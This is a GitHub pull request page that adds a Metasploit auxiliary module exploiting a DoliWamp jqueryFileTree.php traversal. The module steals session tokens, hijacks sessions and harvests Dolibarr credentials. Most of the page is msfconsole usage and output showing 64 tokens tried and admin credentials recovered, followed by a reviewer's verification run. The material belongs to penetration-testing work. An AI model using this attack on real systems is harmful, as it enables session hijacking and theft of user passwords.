Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from
Feb 10, 2014
Merged

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

merged 1 commit into from
Feb 10, 2014

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.

traversal

Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

wchen-r7
wchen-r7 reviewed Feb 3, 2014
View reviewed changes
modules/auxiliary/gather/doliwamp_traversal_creds.rb
vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
return user_id
else
# print_debug("#{peer} - Could not hijack session. Session is invalid.")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Did you mean to leave this commented out? Looks like useful info for debugging purposes.

@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014
@wchen-r7
Copy link
Contributor

Processing.

wchen-r7 added a commit that referenced this pull request Feb 10, 2014
@wchen-r7
Land #2940 - DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials
8a8bc74
@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014
@wchen-r7
Copy link
Contributor

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes

@bcoles bcoles deleted the doliwamp_traversal_creds branch April 6, 2014 13:40
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@bcoles @wchen-r7